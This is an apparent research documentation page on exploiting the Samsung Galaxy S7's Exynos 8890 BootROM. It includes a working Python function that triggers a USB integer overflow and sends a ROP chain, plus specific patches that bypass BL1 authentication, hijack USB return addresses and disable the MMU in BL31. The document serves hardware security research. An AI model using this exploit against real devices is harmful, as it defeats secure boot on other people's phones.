Samsung_S7/documentation/source/BootROM_8890/03_exploit_boot_chain.rst

==================
Exploit boot chain
==================
This part describes the boot chain of the ``Exynos 8890`` SoC. 

.. important::

    This is all still under development and will change.

General overview
===============

Memory layout
^^^^^^^^^^^^^
Keep this overview in mind when reading through the boot chain exploit. 

.. raw:: html

   <iframe src="../_static/stack_and_functions.html" width="100%" height="1000px" frameborder="0" float='center'></iframe>

Approach
^^^^^^^^
In our initial approach, we were manually booting all stages from the debugger, and jumping directly back to the debugger (without using the USB protocol). This was done to keep the debugger alive throughout the boot chain, but this became very difficult after BL31, as the MMU didn't allow us to read/write to most spaces, cutting off our access to BL31 during boot at some point. And losing our debugger interface in the process. 

This is also why there is some ghost code within the project. We were trying to keep the debugger alive throughout the boot chain, but this was not easily feasible.

Boot stages
^^^^^^^^^^^^^^
Get the correct payloads for the bootROM stages from samsung firmware files, or from `Exynos8890 usbdl-recovery images/firmwares <https://github.com/ananjaser1211/exynos8890-exynos-usbdl-recovery>`_.

.. list-table:: bootrom stages
	:header-rows: 1

	* - File
	  - Strings output
	  - Likely boot stage?
	* - sboot.bin.1.bin
	  - Exynos BL1
	  - BL1
	* - sboot.bin.2.bin
	  - BL31 %s
	  - BL31
	* - sboot.bin.3.bin
	  - Unsure. Contains strings like: TOP_DIV_ACLK_MFC_600 and APOLLO_DIV_APOLLO_RUN_MONITOR
	  - BL2?
	* - sboot.bin.4.bin
	  - Contains more textual information, and references to post BL2 boot, and android information
	  - Kernel boot/BL33?

Gupje
^^^^^

.. note::

    `Gupje <https://git.herreweb.nl/EljakimHerrewijnen/Samsung_S7>`_ is the debugger we'll be loading onto the device and will be moving around throughout the bootchain. 

Gupje needs to be built and loaded onto the device. Throughout the exploit, we've been moving the debugger to different spaces in memory on the device. This was necessary as the space we initially used, was in the way of the space used for BL31 or BL2. After BL31, we lost access to the debugger, as BL2 was overwriting our last available space. At some point we moved the debugger to 0x11200000, as we saw that this space was used by BL31. Here below the most important arguments to build the debugger. This space is executable when the MMU is off.

Here the ``linksript.txt`` file.

.. code:: bash

    LINKSCRIPT.txt

    debugger_storage = 0x11201200;
    debugger_stack = 0x11201000;
    debugger_entry = 0x11200000; 

    maybe_usb_setup_read = 0x00006f88;
    dwc3_ep0_start_trans = 0x0000791c;
    usb_event_handler = 0x00007bac;
    get_endpoint_recv_buffer = 0x00007a7c;
    exynos_sleep = 0x000027c8;

    g_recv_buffer = 0x11201600;
    g_data_received = 0x11201400;

And the ``symbols.ld`` file.

.. code:: bash

    SYMBOLS.ld

    MEMORY {
        ROM (rwx): ORIGIN = 0x11200000, LENGTH = 0x1000
    }

    SECTIONS
    {
        . = 0x11200000;
        .text . : {
            *(.text*)
            *(.data*)
            *(.rodata*)
        } >ROM

    }

Debuggers
=========
After initial exploitation the goal was to fully boot the device. We're now moving into the next phase: 1) loading a debugger 2) and then to continue booting the device. If we manage to keep access to the debugger throughout the boot, this gives us room to exploit the device. But, the debugger needs to be kept 'alive' through the boot chain. The main difficulties here are the location of the debugger in memory (as it gets overwritten) and the MMU being enabled after BL31.

Initial debugger
^^^^^^^^^^^^^^^^
The initial debugger is written to ``0x2069000``, with debugger_stack and _storage at ``0x0206b000`` and ``0x0206d000`` respectively.

After the initial loading of the debugger, the processor state reported is (using ghidra assistant):

.. code-block:: bash
    
    root | DEBUG | 
                X0 : 0x0 | X1 : 0xffffffff | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
                X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
                X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 |
                X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
                X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20219b8 | SP/X31 : 0x2020ef0

LR/X30 being the line register. This is the address the processor will jump to when the function is done (important to keep track off). 

Second debugger
^^^^^^^^^^^^^^^
After a cache flush, the debugger seems to be cleared as well, so the debugger is relocated to ``0x20c0000``, with _stack and _storage now at ``0x20c2000`` and ``0x20c4000`` respectively. This is done by running:

.. code-block:: python 

    self.cd.arch_dbg.state.auto_sync = False
    self.cd.arch_dbg.state.auto_sync_special = False
    self.cd.arch_dbg.state.print_ctx()
    
    def relocate_debugger():
        # Seems to be cleared upon cache clearing??
        debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
        self.cd.memwrite_region(0x020c0000, debugger_reloc)
        self.usb_write(b"FLSH") # Flush cache
        self.cd.restore_stack_and_jump(0x020c0000)
        assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
        self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
    relocate_debugger()

The processor state reported then is:

.. code-block:: bash

  root | DEBUG | 
            X0 : 0x0 | X1 : 0x1 | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
            X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
            X14 : 0xf | X15 : 0x20c4000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 |
            X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
            X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20c0000 | SP/X31 : 0x2020ef0

Final debugger
^^^^^^^^^^^^^^
We searched for quite some time for a space which was both writeable and executable. After BL31, most space became unreachable, with the MMU not allowing read/write at most spaces. We tried putting the debugger in the GPU cache, and tried some other spaces visible in the dtsi files, but eventually we found a space at ``0x11200000``. This space is executable when the MMU is off. With the MMU on, we can read/write but not execute here.

Python part
^^^^^^^^^^^

.. code-block:: python
    # Setup initial debugger
    self.setup_guppy_debugger()
    self.cd.arch_dbg.state.auto_sync = False
    self.cd.arch_dbg.state.auto_sync_special = False
    logger.debug('State after setting up initial debugger')
    self.cd.arch_dbg.state.print_ctx()
    DEBUGGER_ADDR = 0x2069000 # 0x2069000

    # Relocate debugger
    debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read()
    self.relocate_debugger(debugger=debugger, entry=0x11200000, storage=0x11201200, g_data_received=0x11201400)
    DEBUGGER_ADDR = 0x11200000

    # Test debugger connection
    self.cd.test_connection()

Stage 1 - Initial exploit
===============
Frederic created a payload called 'Exynos8890dump_bootrom', which used the usb dwc3 protocol (USB Synopsys DesignWare USB 3.0), to read and dump the bootrom. This payload was slightly modified, to keep the USB connection alive (stage1.bin). Frederic's C code was implemented in python.

.. code:: python

        def exploit(self, payload: bytes):
            '''
            Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. 
            '''
            assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"

            current_offset = TARGET_OFFSETS[self.target][0]
            xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
            transferred = ctypes.c_int()
            
            size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 -  header(8) + data(n) + footer(2)
            #size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
            max_payload_size = 0x100000000 - size_to_overflow
            ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) # 
            
            # Assert that payload is 502 bytes
            payload = payload + ((max_payload_size - len(payload)) * b"\x00")
            assert len(payload) == max_payload_size, "Invalid payload. Size is wrong"
            
            # First send payload to trigger the bug
            bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
            bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
            assert res == 0, "Error triggering payload"
            assert transferred.value == len(bug_payload), "Invalid transfered size"
            current_offset += len(bug_payload) - 8  # Remove header
            
            cnt = 0
            while True:
                if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
                    break
                self.send_empty_transfer()
                current_offset += CHUNK_SIZE
                cnt += 1
                if current_offset > 0x100000000:
                    current_offset = current_offset - 0x100000000 #reset 32 byte integer
                print(f"{cnt} {hex(current_offset)}")
            
            remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
            assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
            if remaining > BLOCK_SIZE:
                self.send_empty_transfer()
                # Send last transfer, TODO who aligns this ROM??
                current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
                cnt += 1
                print(f"{cnt} {hex(current_offset)}")
                
            # Build ROP chain.
            rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
            transferred = ctypes.c_int(0)
            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
            assert res == 0, "Error sending ROP chain"
            return

After this exploitation, we're able to send custom payloads. The first payload that is sent, sets up the debugger. In order to run the debugger, a small amount of the bootROM was reversed in order to implement send/recv functionality.

@EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?

Stage 2 - BL1
==========
Here, in order, the patches we applied to get BL1 to boot:

.. figure:: images/boot_chain_bl1.drawio.svg
   :align: center

   Boot chain

- Overwrite the USB return address pointer (`0x02020f60`) to jump back to the debugger. ``self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))``
- Set link register to debugger and jump into the boot USB (`0x000064e0`) function. ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR`` and then ``self.cd.restore_stack_and_jump(0x000064e0)``
- Now we can send the BL1 binary to the device. ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())``. At this point, we retain access to the debugger.
- To patch the authentication, we set X0 and X1 to 1, then again set the link register to the debugger, and jump into the authentication function at ``0x00012848``. ``self.cd.arch_dbg.state.X0 = 1`` and ``self.cd.arch_dbg.state.X1 = 1`` and ``self.cd.arch_dbg.state.LR = lr`` and then ``self.cd.restore_stack_and_jump(0x00012848)``
- We flush the cache ``self.usb_write(b"FLSH")`` (Frederic did this as well). 
- Now we hijack the USB download function to jump back to the debugger. ``self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR))`` and ``self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))``
- And finally, we again restore our link register to the debugger, and jump into BL1 ``self.cd.restore_stack_and_jump(0x000002c0)``


.. figure:: images/initial_boot_function.png
    :align: center

    Overview of the initial boot function in the Exynos 8890.

At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger. 

Regarding auth_bl1: Initially we thought that 0x0 indicated a verified boot state (as is plausible when reading the decompiled code in Ghidra). But after modifying BL1 in the header and contents, this value did not change.

.. note::

    git commit 8cb5f2e1 fully boots, you can use this commit to patch BL1 only.

Stage 3 - BL31
==============

Initial boot through BL31
^^^^^^^^^^^^^^^^^^^^^^^^^
Next up is BL31, which is loaded by BL1. BL31 is written at ``0x02024000`` with the entry point at ``0x02024010``, it ends at ``0x02048000``. ``BL31`` is the secure monitor. The monitor uses memory that is also being used by the debugger, so we will have to relocate it to keep code exeuction.

.. figure:: images/bl31_debugger_memory_example.png
   :align: center

   Example of BL31 using memory from the initial debugger.

BL31 also configures the VBAR_EL3 and MMU so the memory mapping will probably change after this stage (preparation for trustzone?). Here we decided to move the debugger to 0x02048000, as this space is still accessible after BL31, but this space will get overwritten by BL2. 

At this point we switched our approach to booting the device, as we were unable to keep the debugger alive throughout the boot chain. We now boot the device normally, and then try to get our debugger after booting each stage. Because of this, we didn't need to modify a lot after BL1. Essentially all we did was:

- Set the link register to the debugger: ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR``
- Jump into our hijacked USB function: ``self.cd.restore_stack_and_jump(hijacked_fun)``
- Send BL31: ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())``
- Continue a function that BL1 called via the USB: ``self.cd.restore_stack_and_jump(0x2022948)``
- Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)``

This boot process restores us to the debugger, but after this, we're unable to access most memory spaces. Notably, we tried getting access to the TTBR0_EL3. But something prohibits us reading there. We weren't able to find any executable space that was still available, for after BL2. BL2 would overwrite our debugger at this point.

Patching BL31
^^^^^^^^^^^^^
While looking for flags which were used for the MMU, we found a function at ``0x020244e8`` which we were able to turn off, but which still allowed a full boot into recovery. The MMU however stated to being disabled. 

- get special registers: ``self.cd.arch_dbg.fetch_special_regs()``
- MMU state: ``self.cd.arch_dbg.state.R_SCTLR_EL3.mmu``

.. figure:: images/turn_off_MMU_but_good_boot_0x020244e8.png
   :align: center

   Function patheable that turns off MMU, but keeps boot intact.

Additionally we found a space at ``0x11207010``, while looking for bit flags in ghidra, which seemed to be a memory read/write space. This space was not executable, unless the MMU was turned off. We used this space to store our debugger, then before booting BL31, we patched the if-statement above to disable the MMU. And booted. 

- Patch if-statement to not be met: ``self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1))``
- Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)``

Stage 4 - BL2
=============
This is our current progress. BL2 has booted, and shows the VBAR's for EL1.

.. code:: bash
    MMU is 0x0 (0x1=enabled, 0x0=disabled)
    TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142
    VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800
    TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0
    SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0x30c5083a
    MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x1e42bb572931240b, MAIR_EL1: 0x44e048e000098aa4
    Current EL: 0xc